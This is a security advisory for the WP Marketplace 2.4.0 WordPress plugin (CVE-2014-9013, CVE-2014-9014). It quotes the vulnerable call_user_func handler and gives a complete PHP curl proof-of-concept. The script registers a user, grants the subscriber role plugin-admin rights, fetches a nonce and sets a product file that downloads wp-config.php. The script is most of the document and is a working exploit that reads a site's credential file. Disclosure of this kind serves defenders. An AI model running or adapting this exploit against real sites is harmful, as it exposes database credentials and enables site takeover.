WP Marketplace 2.4.0 Arbitrary File Download

Homepage:

https://wordpress.org/plugins/wpmarketplace/

CVE-ID

CVE-2014-9013

CVE-2014-9014

CVSS Score

6.8

CVSS Vector

(AV:N/AC:L/Au:S/C:C/I:N/A:N)

Description:

Anyone can run user defined function because of call_user_func.

File: wpmarketplace\libs\cart.php

function ajaxinit(){
if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){    
	if(function_exists($_POST['execute']))
		call_user_func($_POST['execute'],$_POST);
	else
		echo __("function not defined!","wpmarketplace");
	die();
	}
}

So, we can add subscriber group as plugin admin using wpmp_save_settings().

Then we add new product using wpmp_front_add_product().

Using Digital Product functionality we set which file we want to download.

Proof of Concept:

$file =  '../../../wp-config.php';
$url = 'http://wordpress-url/';
$user = 'userlogin';
$email = '[email protected]';
$pass = 'password';
$cookie = "/cookie.txt";

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

// Register
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'register_form' => 'register',
        'reg[user_login]' => $user,
        'reg[user_email]' => $email,
        'reg[user_pass]' => $pass
    ));
$content = curl_exec($ch);
if (!preg_match("/success/i", $content)) {
    die("Cannot register");
}
// Log in
curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'log' => $user,
        'pwd' => $pass,
        'wp-submit' => 'Log%20In'
    ));
$content = curl_exec($ch);
if (!preg_match('/adminmenu/i', $content)) {
    die("Cannot login");
}
// Add subscriber as plugin admin
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'action' => 'wpmp_pp_ajax_call',
        'execute' => 'wpmp_save_settings',
        '_wpmp_settings[user_role][]' => 'subscriber'
    ));
$content = curl_exec($ch);
if (!preg_match('/Settings Saved Successfully/i', $content)) {
    die("Cannot set role");
}
// Request noonce
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'action' => 'wpmp_pp_ajax_call',
        'execute' => 'wpmp_front_add_product'
    ));
$content = curl_exec($ch);
preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
if (strlen($nonce[1]) < 2) {
    die("Cannot get nonce");
}
// Set file to download
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        '__product_wpmp' => $nonce[1],
        'post_type' => 'wpmarketplace',
        'id' => '123456',
        'wpmp_list[base_price]' => '0',
        'wpmp_list[file][]' => $file
    ));
$content = curl_exec($ch);
header("Location: ".$url."?wpmpfile=123456");

Timeline: